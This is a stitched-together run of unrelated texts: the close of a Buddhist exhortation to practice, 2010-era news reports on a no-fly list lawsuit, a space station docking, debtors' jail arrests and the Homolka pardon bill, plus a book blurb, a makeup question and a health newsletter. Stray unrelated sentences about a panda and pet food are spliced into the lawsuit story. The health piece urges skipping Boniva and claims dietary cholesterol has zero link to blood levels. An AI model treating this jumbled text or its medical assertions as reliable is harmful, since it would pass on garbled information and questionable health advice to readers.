among the three poisons . ( 1 )
The evil realms ( 2 )
have no real power to seduce us ,
yet many enter them .
The deluded mind values
the four elements ( 3 ) that make up the body
and the five desires ( 4 )
as if they were jewels .
This being so ,
is there anyone who does not long
to retire to the seclusion of the mountains
in order to practice the Way ? ( 5 )
Yet people do not go there ;
they remain caught up in desire .
Although you do not
retire to the mountains
to cultivate your mind ,
you should strive with all your energy
to perform good deeds .
If you can renounce your own pleasure ,
you will become as trusted and respected
as the sages .
If you can undergo
that which is difficult ,
you will become as respected
as the Buddha .
Those who greedily seek after things
join the ranks of demons .
Those who give with compassion
are the disciples of the Dharma King .
High mountains and lofty peaks
are where the wise reside .
Green pines and deep mountain valleys
are home to those who practice .
When hungry , such people pick fruit from trees
to calm their empty stomach .
When thirsty , they quench their thirst
with water from a stream .
Although we eat fine foods
in an attempt to carefully preserve this body ,
our bodies will definitely face destruction ;
even though we cover this body
with soft cloth ,
our lives are sure to come to an end .
Make a small mountain cave where echoes resound
into a hall to chant the Buddha ’s name .
Let the sad cry of a wild goose
be the heart - warming call of a friend .
While bowing , your knees may become
as cold as ice ,
but you must not long for a warm fire .
Your stomach may writhe with hunger ,
but you must not give in to your thoughts of food .
One hundred years pass like the blinking of an eye ,
so why do n’t you practice ?
How long is a lifetime ?
Can you afford to neglect practice ,
wasting your time on leisure ?
It is only he who renounces
all of the desires in his heart
that is rightfully called a practicing monk .
Only he who no longer yearns for the ways of the world
is called “ a monk who has renounced the house - holder ’s life . ”
A practitioner who is caught
within the net of worldly desires
is like a dog who wears
elephant ’s hide .
A man who practices the Way
yet remains attached to worldly desire
is like a hedgehog
who tries to enter a rat hole .
Some people , in spite of their outstanding ability and wisdom ,
choose to live in the busy atmosphere of the city .
All the Buddhas feel pity and concern for such people .
other people , although they have not yet developed
a deep practice ,
choose to stay in the contemplative atmosphere of the mountains .
The sages feel a great joy
when they see such people .
There are those who are skilled and learned ,
but do not follow the precepts .
They are like men who are told of a cache of jewels
but do not get up and go to it .
There are those who practice steadfastly
but lack wisdom .
They are like men who want to go east
but mistakenly walk towards the west .
The actions of a wise man
are like steaming grains of rice
in order to make a bowl of rice .
The actions of a man who lacks wisdom
are like steaming grains of sand
in order to make a bowl of rice .
Everyone knows how to eat and drink
in order to satiate their hunger ;
but no one seems to understand
the method of training —
the way to transform the ignorant mind .
Practice and wisdom must exist side by side .
For they are like the two wheels of a cart .
Likewise , helping oneself and helping others
are like the two wings of a bird .
If you absent - mindedly chant for your donors
over the morning offering of porridge
without understanding the meaning ,
you should feel ashamed
to face those who give alms .
If you chant
during the lunch - time ceremony
without attaining the essence of the words you utter ,
wo n’t you be ashamed to face
great people and sages ?
Everyone hates squirming insects
and those who ca n’t distinguish between the dirty and the clean .
Likewise , the sages feel disgust with those monks
who cannot distinguish between the defiled and the pure .
If you wish to be through with this world ’s conflict ,
good conduct is the ladder
that ascends to heaven .
Therefore , one who violates the precepts
and yet wishes to help others
is like a bird with broken wings
that puts a turtle on its back and tries to fly .
If you ’re still not free from your own faults ,
you will not be able to free others of their faults .
So why do you , who violate the precepts
receive that which is provided by others ?
It does not benefit you in the least
to merely maintain your physical body
if you neglect to practice .
And all your concern for this transient , fleeting life
will not preserve it .
If you ’ve set your sights
on the virtue of the great masters ,
you must endure even the longest hardships .
Once you ’ve set out for the Tiger Throne , ( 6 )
you must forever leave all your desires behind you .
When the cultivator ’s mind is pure ,
all the devas ( 7 ) bow in praise of him .
When a follower of the Way loves lasciviousness ,
the good spirits leave him .
At death , when the four elements of the body scatter ,
you cannot preserve the body and remain in it any longer .
Today , evening has already arrived ;
tomorrow morning will soon be here .
So , practice now before it is too late .
Worldly pleasures are unsatisfactory ;
why do you greedily cling to them ?
Enduring joy can be won through a single effort in patience ;
why wo n’t you practice ?
Those who practice feel shame
to see a seeker of the Way who remains attached to greed .
The virtuous man laughs
at the seeker who forsakes the householder ’s life
but is still wealthy .
Words , such as these written here , go on and on ,
yet clinging attachment does not come to an end .
“ I ’ll do it next time ” — such words go on and on ,
yet you fail to put an end to clinging .
Clinging goes on and on ,
yet you fail to renounce worldly matters .
Your mind is filled with endless devious plans ,
yet you do not make up your mind to put an end to them .
“ Today will be different , ” you say ,
yet you continue to perform evil actions every day .
“ Tomorrow , tomorrow , ” you say ,
yet few are the days when you really do something good .
“ This year will be different , ” you say ,
yet your defilements are without end .
“ Next year I ’ll do it , ” you say ,
yet you do n’t grow in wisdom .
The hours pass ,
snd too soon a day and night are over .
The days pass ,
and soon it ’s the last day of the month .
The months pass ,
and suddenly another new year has come .
The years pass ,
and in the blinking of an eye ,
we find ourselves at death ’s door .
A broken cart
cannot be driven .
When you ’re an old man ,
you can not begin to practice .
When you lie down ,
you will succumb to laziness .
And when you sit ,
your mind will be overwhelmed
with stray thoughts .
For many lifetimes , you have failed to practice ,
passing your days and nights in vain .
Having lived many lifetimes in vain ,
will you again fail to practice during this lifetime ?
This body will inevitably come to an end ;
who knows what body you will have next time ?
Is n’t this an urgent matter ?
Is n’t this an urgent matter ?
N o t e s
==============
1. Greed , hatred ( anger ) andignorance .
2. Durgati , the hell realm , the animal realm , etc. ; there are 3 , 4 , or 5 according to text consulted .
3. Earth , water , fire and air are the four elements that everything is made of .
4 . There are two meanings : 1 ) the objects of the 5 senses ( eye , ear , nose , mouth , body ) ; these defile the True Nature when the mind is filled with desire ; 2 ) desire for wealth , sex , food , fame , and sleep .
5 . The Way refers to the path to enlightenment .
6 . This is a name for the Dharma Seat , the special platform that a great monk sits on to give a Dharma lecture .
Someone aiming to sit on this seat is aiming for enlightenment and so needs to give up all attachments and desires .
7 . The devas are the beings who live in the Heavenly realms .
Ten U.S citizens and residents , three of whom are veterans , are stuck abroad or cannot fly within or out of the United States because they are wrongly on a no - fly list , according to a federal lawsuit lodged Wednesday .
The Oregon federal court case claims the plaintiffs , many with Middle Eastern names who have committed no legal wrongdoing , have asked the Department of Homeland Security and Transportation Security Administration for an explanation , to no avail .
The government , according to the suit brought by the American Civil Liberties Union , has not offered any explanation for plaintiffs ' " apparent placement " on the no-fly list or any other watch list .
" They 're too scary to fly but not scary enough to arrest , " quipped Ben Wizner , an ACLU attorney on the case .
Wizner believed it was the first lawsuit testing the constitutionality of the government 's ability to bar flight , though that topic has been the subject of repeated litigation often brought by those forced to undergo heavy screening before flying .
The no-fly list , its current form adopted in the wake of the 2001 terror attacks , includes some 8,000 names .
About another 20,000 are on a so - called " selectee " list requiring passengers to endure extra airport security .
The suit names Attorney General Eric Holder , FBI Director Robert Mueller III and Terrorist Screening Center Director Timothy Healy .
It seeks the removal of the plaintiffs ' names " from any government watch list that has prevented them from flying . "
The lawsuit also demands " a hearing in which they can confront any evidence against them and contest their unlawful designation . "
The Justice Department did not respond for comment .
The DHS has a website to lodge complaints , which the plaintiffs in this case have done .
" The government will not confirm you 're on this , explain the basis of being on the list , or give an opportunity to rebut why you 're on the list . "
The suit claims it is unconstitutional to deny flying rights under a system veiled in secrecy with no clear method of getting off the no-fly list .
Here is a briefing on the plaintiffs ' allegations .
* Adama Bah , 22 - year - old citizen of Guinea was granted refugee status and lives in New York .
She is barred from flying from the United States .
* Mohamed Sheikh Abdirahman Kariye , a 49 - year - old naturalized U.S. citizen and imam of Oregon , is denied flight to Dubai , where his daughter lives .
Now that I have trained my panda , it 's ready to go out and fetch me some new tunes .
* Ayman Latif , a 32 - year - old U.S. citizen and disabled Marine veteran residing in Egypt , is denied flight from Egypt to the United States for medical evaluation .
* Steven Washburn , a 54 - year - old U.S. citizen and Air Force veteran , is denied flight to United States from Britain .
* Raymond Earl Kneable IV , a 29 - year - old U.S. Citizen and Army veteran , recently traveled from United States to Colombia to get married and visit relatives .
He is barred from returning to California .
The post office , for some reason , is where you buy food for your pet .
Maybe in virtual worlds , everybody orders everything off of a virtual internet -- who knows .
* Halime Sat , a 28 - year - old German citizen and U.S. resident , is barred from flying from the United States .
* Nagib Ali Ghaleb , a 39 - year - old U.S. citizen , is stuck in Yemen where he traveled from California to visit family .
* Samir Mohamed Ahmed Mohamed , a 29 - year - old U.S. citizen , is trapped in Yemen where he traveled from California to visit family .
* Abdullatif Muthanna , a 29 - year - old U.S. citizen , is stuck in Yemen where he traveled from New York to visit family members .
* Saleh Omar , a 35 - year - old lawful U.S. resident , is denied flight to United States from Yemen , where he was visiting relatives .
Dubai Airport photo : joiseyshowaa / Flickr
See Also :
This view from a camera on the exterior of the International Space Station shows the unmanned Progress 37 cargo ship and Soyuz crew - carrying capsule on July 2 , 2010 after another unmanned cargo ship - Progress 38 - failed to dock as planned .
An unmanned Russian cargo ship that missed its firstchance to dock at the International Space Station last week tried again Sunday ?
this time successfully linking up with the orbiting lab .
The Progress 38 cargo ship docked flawlessly at 12:17 p.m. EDT ( 1617 GMT ) while flying without the safety net of a remotecontrol system that allows cosmonauts inside the space station to take commandof incoming supply ships using a joystick should they veer off course .
The successful docking comes two days after the Progress38 cargo ship 's first faileddocking attempt on Friday , in which the spacecraft sailed clearpast the space station after aborting its delivery run .
" No doubt a sigh of relief on the part of the Russian control team , " NASA commentator Rob Navias said in a NASA TV broadcast after today 's smoothdocking .
The orbital rendezvous occurred 220 miles ( 354 km ) aboveEarth as both spacecraft flew over the point where the borders of China , Kazakhstan , Mongoliaand Russia meet .
The Progress38 supply ship launched Wednesday and delivered 2.5 tons of new equipment , fresh food and other supplies for the space station 's six - person crew .
" Congratulations on the successful Progress docking , " flight controllers at Russia 's Mission Control center near Moscow told thestation crew .
Docking glitch traced to interference
Russian engineers suspect it was interference between the Progress vehicle remote control system on the InternationalSpace Station and a TV camera on the space freighter that forced theincoming spacecraft to abort its first approach on Friday .
Instead of docking to an aft berth on the station ' sRussian Zvezda module , the Progress 38 cargo ship flew by at a range of about 3 miles ( 3 km ) to a point about 186 miles ( 300 km ) in front of the space stationuntil another attempt could be made .
For Sunday 's docking , Russian flight controllers opted toforgo any use of the remote control system , called the Telerobotically OperatedRendezvous Unit ( TORU ) .
Instead , they checked and rechecked the Progress 38's autonomousKurs navigation system , as well as its backup system , to make sure thespacecraft was completely ready to dock itself at the space station .
" Everything was tested extensively yesterday , including the primary and backup systems , " Navias said .
Like Russia 's crew - carrying Soyuzspacecraft , the unmanned Progress freighters are designed to fly themselvesto the space station using the Kurs navigation system .
Soyuz spacecraft can beflown manually by cosmonauts from inside the vehicles , while Progress can beguided in using the TORU system .
Both spacecraft have a long track record for reliability , though some have had to be guided in by cosmonaut every now and then .
The last Progress to be docked under cosmonaut control arrived at the station on May 1 .
" It is a bitsurprising , " former NASA astronaut Leroy Chiao , a former space stationcommander , told SPACE.com of the recent Progress malfunction .
" Thesevehicles are very reliable , and the operations for getting them to stations arequite mature . "
Holiday delivery
Sunday 's cargo ship arrival at the International SpaceStation also occurred on the Fourth of Julyholiday in the United States .
As both a weekend and a U.S. holiday , the station crewhad expected to have the day off , but worked through the Progress 38 ship ' sarrival instead .
Of the six people living on the space station , three areAmericans and three are Russians .
One of the station 's American crewmembers , NASA astronautDouglas Wheelock , sent July 4th greetings to Earth to mark Independence Day inspace .
" In celebration offreedom and liberty ?
Happy 4th from the [ space station 's ] Russian Segment !
" Wheelock wrote in a post on Twitter , where he is chronicling his missing underthe name Astro_Wheels .
The station crew will open the Progress 38 cargo ship later today to begin unloading supplies , NASA officials said .
Packed aboard the spacecraft are 1,918 pounds ( nearly 870 kg ) of propellant for the station , 110 pounds ( nearly 50 kg ) ofoxygen , 220 pounds ( 99 kg ) of water and 2,667 ( 1,209 kg ) pounds of dry cargo ?
which includes spare parts , science equipment and other supplies .
C by Tom McCarthy
Tom McCarthy ’s first novel was published in a run of just 750 copies by an underground French imprint after the UK turned it down ; it was subsequently snapped up by independent British publisher Alma Books after word of mouth began to grow , and McCarthy is now published by Random House .
This third novel , C , opens in the early 20th century and follows the story of Serge Carrefax , whose father runs a school for deaf children while experimenting with wireless communication .
After working as a radio operator during the First World War , Serge is later taken to a German prison camp , escapes , and eventually ends up in an Egyptian tomb .
Read Tom McCarthy on technology and literature
My skin is not terrible , so i dont need MAX coverage , but i want to look good you know ?
I am 15 and I currently use tinted moisturizer
my skin is pretty dry now in the winter time , but it gets oily once i put something on it , so not too dry or oily .
and I dont want it to make me look like I have a mask on or cakey
or super white in pictures
thanks !
Newsnight 's Sue Lloyd - Roberts has visited North Korea on an official trip to view celebrations marking the birthday of the country 's founder Kim Il - sung .
The secretive Stalinist state does not allow access to the World Wide Web , and instead has its own version - a closed intranet on which carefully selected information is made available to users .
Here Sue Lloyd - Roberts takes a look at the system and talks to university students about what they know of the outside world .
Watch Sue Lloyd - Roberts ' full film from inside North Korea on Newsnight on Tuesday 1 June 2010 at 10.30 pm on BBC Two , then afterwards on the BBC iPlayer and Newsnight website .
Channel 4 reports a driver on the 78 bus between Arlington and Harvard Square got a quick 10 - day suspension after an alert motorist snapped a photo of him reading the paper while driving the bus this morning - and then e-mailed the portrait to the T ( and Channel 4 , natch ) .
In last year ’s Guide to Good Health titled Somebody Warn Sally Field , I covered how drugs like Fosamax and Boniva , two of the pharmaceutical “ answers ” for bone loss , may actually weaken bones and slow their ability to heal .
Well , now I have another good tip for Sally Field :
If you really want to prevent hip fractures , skip the Boniva and eat more steak !
Scientists from Harvard Medical School have found that just eating more steak may cut your risk of hip fractures by 50 percent !
Steak dinner for stronger hips ?
Well , to be honest , it ’s not just steak that ’s going to protect you from hip fractures .
So will eggs and fish .
And chicken and lentils .
And raw milk and almonds .
In fact , Harvard researchers have found that just about anything that contains PROTEIN can help you prevent hip fractures .
You just have to make sure you ’re getting plenty of it .
But unfortunately , most seniors do n’t get enough .
In fact , if you ’re over 60 , your daily meal plan may look a little like this :
Breakfast : Coffee and a whole - wheat bagel
Lunch : Turkey sandwich and a pear
Dinner : Salmon , rice , and broccoli
Sure , this meal plan looks relatively healthy .
But it only boasts about 30 grams of protein .
And if you eat like this day after day , year after year , you ’re just asking for a hip fracture .
So how much protein do you need to prevent fractures ?
A group of Boston scientists recently figured it out …
High protein diets result in fewer fractures
Scientists analyzed the daily protein intake of 946 seniors enrolled in the Framingham Osteoporosis Study .
They found that men and women with the lowest protein intake had 50 percent MORE hip fractures than participants with normal intakes .
On the other hand , men and women who consumed adequate protein had higher bone mineral density and the fewest fractures .
You see , the drug industry wants you to believe that the ONLY way to prevent fractures is to take a drug to build thicker bones .
But clearly there ’s another way : Just do n’t fall .
And how do you prevent falls ?
You build stronger muscles .
And what ’s a key component to stronger muscles ?
You got it : Protein !
In fact , Marian T. Hannan , lead author for the study , says women over 65 need at least 46 grams of protein per day and men need 56 grams .
Sounds easy ?
Well it is .
You just have to make a few adjustments to your meal plan , and you ’ll feel the difference in no time .
Build protein into your diet
The meal plan I mentioned earlier is a good start .
But here ’s the biggest problem : there ’s not enough breakfast protein !
The easiest way to get more protein in the morning is to skip the bagel and eat an egg ( or two ) .
Just one egg contains almost seven grams of protein .
Plus , they ’re rich in other important nutrients such as omega - 3 fatty acids and choline .
Just make sure to go for organic , free - range brown eggs .
Get them from a local farmer , if you can !
You ’ll know these eggs are the real deal if they have dark ( almost orange ) yolks and hard shells .
And let me just say this to anyone ’s who ’s been brain - washed to believe that eating eggs will raise your cholesterol :
It wo n’t .
Even if you eat 10 eggs a day , it wo n’t make a lick of difference .
You see , there are a limited number of receptor sites for cholesterol in your gut , so there ’s a limit to how much you can absorb from the foods you eat .
And here ’s the real kicker : even if you believe high cholesterol in your blood is a factor for heart disease ( which I do n’t ) , there is ZERO correlation between oral intake of cholesterol and blood serum levels .
Yep .
We ’ve been had folks .
So go ahead and eat an egg ( or two ) for breakfast , unless your doctor resolutely forbids it .
( And if that ’s the case , I would still avoid the egg - substitutes with a 10 - foot pole and opt to get your protein elsewhere . )
Another easy way to add more protein into your day is to sprinkle nuts over a salad or yogurt .
Just a handful of almonds alone contain 6 grams of protein !
And if you use Greek yogurt , you ’ll get 15 to 20 grams of protein from one serving right there !
Plus , it has a super creamy texture and is a real treat for your pallet .
In closing , this week take the protein test .
Write down everything you eat in a given day and add up all the protein .
Remember , for women , your total should add up to at least 46 grams , and for men it should be 56 grams .
If you do n’t cross that threshold , look for ways to up your protein .
It just may lower your risk of hip fracture by up to 50 percent !
Related Articles
HARRISON , N.J. -- Major League Soccer plans to keep Landon Donovan .
MLS commissioner Don Garber said the league has no intention of accepting transfer offers for the Los Angeles Galaxy midfielder .
" He 's become a real soccer hero , " Garber said Thursday after the news conference to announce French star Thierry Henry 's signing with the New York Red Bulls .
" MLS needs soccer heroes , and we have a great American soccer hero playing for us in LA , holding the torch for the sport in our country , and that 's very important .
I do n't believe that it 's something we can do without . "
“ He 's become a real soccer hero .
MLS needs soccer heroes , and we have a great American soccer hero playing for us in LA , holding the torch for the sport in our country , and that 's very important .
I do n't believe that it 's something we can do without .
” -- MLS commissioner Don Garber on Landon Donovan
Donovan was the best U.S. player at the World Cup , scoring three goals to become the American career leader with five .
He agreed in December to a four - year contract with MLS that pays him a base salary this year of $ 2.05 million .
While Donovan struggled during previous stints with Bayer Leverkusen and Bayern Munich , he played strongly and attracted renewed attention in Europe when MLS loaned him to Everton for 10 weeks in January .
Donovan scored two goals in 13 matches , helping the Toffees beat Chelsea and Manchester United , and draw against Arsenal .
Everton captain Phil Neville told Everton TV last week during the club 's preseason tour of Australia that " I 've spoken to Landon and I know for a fact that he wants to come back here . "
When he returned to the Galaxy from the World Cup on July 2 , Donovan left an opening .
" Right now , I want to be in America , " he said .
" If there 's something serious to look at , then I will .
I never say never to anything .
But for now , I 'm very excited to be home . "
Garber said additional offseason loans are possible but is n't interested in a permanent transfer .
" Landon is in my view the greatest player of our generation and an incredibly valuable part of our history but also of our future , " Garber said .
" He proved in England last year on loan and he proved in South Africa that he 's a world - class player and he's also proved that he loves our league and really has accepted the mantle of really being one of the leaders of the sport .
It is my hope and my expectation that we have him for the rest of his career because I think the contributions that he makes are invaluable to our future success . "
Donovan 's agent , Richard Motzkin , declined to respond to Garber 's remarks .
Copyright 2010 by The Associated Press
[ Rumor ] GoldenEye Coming To Wii ?
by Corey Dockendorf [ Monday , 7th of June 2010 - 10:53 PM
]
classic four person Nintendo shootermight be being built from the ground up by Activision , and coming to Wii consoles .
This leak comes with possible box art and some concept screens .
According to the leak , has been " Modernized " and will feature all the weapons and characters we love from Onatopp to Trevalyan , as well as classic weapons like the PP7 and high tech assault rifle .
The leak also showed a picture of a new Wii controller shell , and a soon to be coveted gold plated classic N64 controller .
Yep looks like everything is there for all the classic fans , but this time you 'll be playing as the new bond ( Daniel Craig ) .
There is going to be a lot of pressure on Nintendo to bring this game to life on the Wii .
They will have to recapture the imagination of players from thirteen years ago , and still give something new and fresh for the current generation of gamers .
Imprisoned for debt in America
By Nancy Hanover
16 July 2010
People are being thrown in jail for failing to pay debts in the United States , despite the fact that federal imprisonment for debt was abolished in 1933 .
The Minneapolis Star - Tribune has documented such arrests , essentially for poverty , increasing throughout the United States .
During the last four years , the use of arrest warrants against debtors in Minnesota has jumped by 60 percent , to 845 cases in 2009 .
The exposé showed that sometimes the unpaid bills were as low as $ 85 .
The mechanism used to extract payment from the impoverished is the bench warrant .
Workers are not actually incarcerated for debt , but for failing to respond to the legal system .
However , the perpetrators of the court filings , the debt buyers and their legal representatives , are transparently using the system to intimidate , harass and frighten individuals into payments , sometimes for debts they do not even owe .
“ In Illinois and southwest Indiana , some judges jail debtors for missing court - ordered debt payments .
In extreme cases , ” the Star - Tribune reports , “ people stay in jail until they raise a minimum payment .
In January , a judge sentenced a Kenney , Illinois , man to ‘ indefinite incarceration ’ until came up with $ 300 towards a lumber yard debt . ”
The self - employed roofer had broken his neck and back and filed for disability .
After three hours in a holding cell , his wife got him released by borrowing $ 300 on a credit card .
Joy Uhlmeyer was stopped and arrested in her car on her way home from spending Easter with her elderly mother .
After a costly divorce in 2006 , she defaulted on a $ 6,200 Chase credit card .
She was arrested and spent a freezing night in a holding cell .
Then , handcuffed in a squad car , she was taken to downtown Minneapolis for booking .
After 16 hours , she was fingerprinted and learned why she was being held .
She had missed a court hearing scheduled by Resurgence Financial , a company she had never heard of .
She said , “ The really maddening part of the whole experience was the complete lack of information .
I kept thinking ‘ If there was a warrant out for my arrest , then why in the world was n’t I told about it ? ’ ” she recounted to the Star - Tribune .
Behind these and countless other cases across the country stand collections firms and debt - buyers .
But behind these middlemen stand the major banks —
Chase , Citigroup , etcetera — who profit most from the collection industry .
Tens of thousands of suits are routinely filed in state courts by the large debt - buying companies .
Once a judgment is issued , a court date is set .
However , if for any reason a consumer fails to appear for a court date , a bench warrant can be issued for “ default . ”
In many cases , consumers are unaware of the case against them .
The Legal Aid Society of New York ’s study showed that the debt buyers often had not notified the purported debtor , and in many cases had no proof of claim .
Their study found that debt buyers filed over 450,000 lawsuits in New York alone , winning default judgments against many workers .
When these cases came to court only 1 percent of the debtors were represented by legal counsel .
The Star - Tribune points out that no national statistics are kept on arrested debtors in the US .
“ My suspicion is the debt collection industry does not want the world to know these arrests are happening , because the practice would be widely condemned , ” said Robert Hobbs , deputy director of National Consumer Law Center in Boston .
“ We have created a de facto debtors prison system in the United States that is largely unconstitutional , ” said Judith Fox , a law professor at Notre Dame Law School .
“ In some parts of the country , people are so fearful of arrest they are scrambling to pay money they might not even owe , ” she concluded .
Haekyung Nielsen , 27 , of Bloomington , Minnesota , told the Star - Tribune that police arrived with a civil arrest at her home two weeks after giving birth through Caesarean section .
A debt buyer had sent her court papers for an old credit card debt while she was in the hospital .
“ To send someone to arrest me two weeks after a massive surgery that takes most women eight weeks to recover from was just unbelievable , ” she said .
The Minneapolis paper also noted the tendency for bail to be set at the judgment amount , the court - defined amount of debt .
The Star - Tribune spoke to Judge Robert Blaeser , Hennepin County court civil division , who said that linking bail to debt streamlines the process .
Creditors , in most cases credit card companies , are then able to petition the courts for the money .
They cite the case of Vee , a highway construction worker who was arrested one afternoon in February while driving his teenage daughter home from school .
“ As he was being cuffed , Vee said his daughter , who has severe asthma , started hyperventilating from the stress .
‘ All I kept thinking about was whether she was all right , if she was using her inhaler , ’ he said .
From the jail , Vee made a collect call to his landlord who promised to make his bail .
It was $ 1,875.06 , the exact amount of a credit card debt .
The court system collected his debt on behalf of the credit card company , but Vee — like many others — continues to be traumatized by the experience .
He still has unpaid medical and credit card bills and owes $ 40,000 on an old second mortgage .
He told the Star - Tribune that the sight of a squad car in his rearview mirror fills him with anxiety , “ Are the cops going to arrest me again ...?
So long as I ’ve got unpaid bills , the threat is there , ” he concluded .
The legal threat of a bench warrant against debtors is not new .
What is new is the huge , highly capitalized and aggressive debt - buying and collection business .
These middle men enable the credit card companies and the large banks that underwrite them to first “ charge off ” the debt , e.g. , write it down as a business loss , then to sell the debt to the next tier of debt buyer .
According to the court data accessed by the Star - Tribune , three debt buyers — Unifund , CCR Partners Portfolio Recovery Associates and Debt Equities LLC — account for 15 percent of all debt - related arrest warrants issued in Minnesota since 2005 .
The publicly - traded debt - buyers purchase old debt for pennies on the dollar ( some of it past the statute of limitations ) and then use teams of lawyers to collect the debt .
In many cases the debt is impossible to verify .
The National Consumer Law Center estimates that 1 in 10 debt - buyers ’ lawsuits are based on inaccurate information .
The Star - Tribune reports that the top 10 debt - buyers in Minnesota obtained more than $ 223 million in court judgments from 2005 to 2009 .
This represents tens of thousands of individuals who are squeezed mercilessly for their last discretionary dollar .
Jail is just the most extreme of the measures used to this end .
Meanwhile , debt - buyers are handsomely rewarded for their service to the financial industry , the large banks and the credit card companies .
For debt - buyers profits have never been better .
Portfolio Recovery Associates earned $ 44 million last year , an almost unheard - of 16 percent net profit margin .
In the first quarter of 2010 Portfolio ’s profits skyrocketed even higher , with a net income increase of 47 percent .
They are not alone .
San Diego - based accounts receivable management company Encore Capital Group increased net income 21 percent or $ .44 per share .
These firms showed significant gains in all divisions — collection agency outsourcing , call centers , legal collections and bankruptcy servicing .
The author also recommends :
The American way of debt : Turning a profit by preying on the poor
[ 14 October 2009 ]
MONTPELIER , Vt. — Score one for David .
Goliath decided it just was n't worth the fight .
The federal government has decided to close a tiny U.S. - Canada border station rather than push ahead with a controversial plan to expand it by seizing a dairy farmer 's land , officials announced Thursday .
U.S. Customs and Border Protection had sought to renovate the sleepy Morses Line port of entry in Franklin -- which gets about 2 1/2 vehicles an hour -- by seizing a 2.2 - acre parcel from the Rainville family dairy farm , which adjoins the station .
" This means my father can harvest his crops and go about his business without having to worry what his farm is going to look like a month down the road , " said Brian Rainville , 36 .
By any measure , the Depression - era border station -- a small brick building surrounded by pastures and hayfields -- was a better candidate for closure than a big - ticket renovation .
Sitting on a half - acre of land , its agents sometimes get so bored waiting for business that they hit golf balls or shoot skeet out back .
But the U.S. Department of Homeland Security , which got $ 420 million from the federal bailout to modernize land ports like it , wanted to make it a project .
Customs officials initially wanted to take 10 acres from the dairy farm , then cut it to 4.9 acres , warning the family in a letter that if it did n't agree to sell for $ 39,500 , the land would be seized through eminent domain .
Last month , officials reduced that to 2.2 acres .
The plan drew opposition from the Rainvilles , Sen. Patrick Leahy and many along the quiet border .
In a public hearing last month , about 150 people packed into Franklin Town Hall , some carrying signs that read " Eminent Domain Equals Federal Land Grab " and " Save the Rainville Family Farm . "
Of the 18 people who spoke , none favored the plan .
Some called it wasteful , an abuse of eminent domain or worse .
On Thursday , Leahy announced that Homeland Security Chief Janet Napolitano had agreed to close the station instead , calling it the only appropriate course of action .
The decision was based on " extensive consultations with the local community and our partners in Congress , " as well as " independent analyses by security and construction experts , " spokesman Clark Stevens said in a statement .
The process will take about a year , to accommodate public comment , consultations with stakeholders and assessments of safety and traffic patterns , he said .
" It makes good sense , " said Leahy , D - Vt .
" It was too much for too little . "
Rainville , who had said the loss of the land could put his family 's dairy operation out of business by eliminating one of the feed sources for its dairy cows , said it was clear that upgrading the station was n't essential to national security .
A civics teacher by profession , he said the decision restores his faith in government .
" I do n't see this as a victory for my family as much as I see it as an absolute affirmation of the democratic process , " he said .
© Copyright 2010 Associated Press .
All rights reserved .
This material may not be published , broadcast , rewritten , or redistributed .
Mr Bloom said a deep change is under way in investor psychology as funds and central banks respond to the blizzard of shocking US data and again focus on the fragility of an economy where public debt is surging towards 100 pc of GDP , not helped by the malaise enveloping the Obama White House .
" The Europeans have aired their dirty debt in public and taken some measures to address it , whilst the US has not , " he said .
The Canadian Press
WARWICK , Ont . - A man trying to pull his tooth out while driving has been charged .
Provincial police say around 11:30 a.m. on June 30 , an officer responded to a complaint of a tractor trailer allegedly driving " all over the road " on Highway 402 in Warwick , Ont .
The officer pulled the vehicle over and discovered the man was trying to yank out his tooth while driving .
Police say the driver allegedly rigged a string around the affected tooth , mounted the string to a fixed point on the roof of the cab and waited for a bump to yank it out .
Police say the bloody tooth and string lay next to the man when he was pulled over .
A 58 - year - old man has been charged with careless driving .
A New York judge has issued a temporary restraining order restricting the transfer of Facebook Inc. 's assets , following a suit by a New York man who claims to own an 84 % stake in the social - networking company .
Paul D. Ceglia filed a suit in the Supreme Court of New York 's Allegany County on June 30 , claiming that a 2003 contract he signed with Facebook founder and Chief Executive Mark Zuckerberg entitles him to ownership of the company and monetary damages .
The ...
OTTAWA — Federal political parties have joined forces to ensure notorious sex killer Karla Homolka wo n’t be pardoned for her gruesome crimes .
The four parties struck an 11th - hour deal Wednesday to hive off measures in a pardon - reform bill that would effectively ban Homolka from receiving a pardon .
The measures are to be passed at all stages by the end of the day Thursday , when the House of Commons is expected to adjourn for the summer .
The Senate , which will sit several weeks longer , must also pass the bill before it can go into effect .
Other more contentious provisions of the bill will proceed at a more leisurely pace when Parliament resumes in late September .
Homolka , who served a 12 - year sentence for her role in the rape - murders of Ontario teens Leslie Mahaffy and Kristen French , is eligible to apply for a pardon as of July 4 .
“ My family is forced to relive the pain and horror every time that woman ’s name is in the news .
A pardon would be unthinkable , ” said Talin French - Doyle , one of Kristen French ’s relatives , in a press release .
“ Forgiveness is the right of a victim , not a requirement of the state . ”
There is no confirmation that Homolka actually plans to apply for a pardon .
But the theoretical prospect led to an ugly round of finger - pointing Wednesday among the four parties over who would be held responsible if the pardon reform bill is n’t passed in time to prevent a possible Homolka pardon .
With no party wanting to take the blame , a deal seemed inevitable despite the overheated rhetoric .
Public Safety Minister Vic
Toews confirmed late in the day that a deal had been struck .
“ On the critical area of our bill so as to prevent notorious criminals from receiving a pardon , we have an agreement , ” Toews said .
As to Homolka , he added : “ That kind of a person would not be able to get a pardon . ”
Toews would not go into detail but sources said the parties have agreed to essentially split the original bill in two .
Under the provisions that will pass immediately , anyone convicted of a serious personal injury offence — including manslaughter , violent assault and sexual assault — will have to wait 10 years after release from prison before applying for a pardon .
Currently , they must wait three to five years .
Moreover , the National Parole Board , which now rubberstamps most pardon applications , will be given the discretion to deny a pardon if it would severely damage the reputation of the justice system .
The latter provision is meant to ban someone like Homolka from receiving a pardon .
Provisions that will wait until the fall to proceed include a proposed ban on pardons for anyone convicted of three indictable offences .
Opposition parties are concerned that goes too far , potentially denying a pardon to someone who may have committed relatively minor offences in their youth , such as forging several cheques .
Earlier Wednesday , Toews and his fellow Conservatives used the spectre of a Homolka pardon to try stampede the three opposition parties into speedily passing the entire pardon - reform bill .
“ Enough games from the opposition , ” Toews declared at one point in the Commons .
“ We are committed to preventing the pardoning of notorious criminals now .
Why will the Liberals not support us ? ”
However , the opposition parties steadfastly refused to expedite passage of the bill in its entirety .
They accused the government of deliberately delaying the bill — which was introduced a month ago and has made little legislative progress since — to create a last - minute crisis .
“ It ’s their fault , not ours , ” said Liberal Leader Michael Ignatieff .
NDP Leader Jack Layton said the government deliberately waited until the dying seconds of the parliamentary sitting in a bid to “ prevent debate on all the other items that are in ( the bill ) and perhaps pin it on this situation regarding Karla Homolka . ”
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
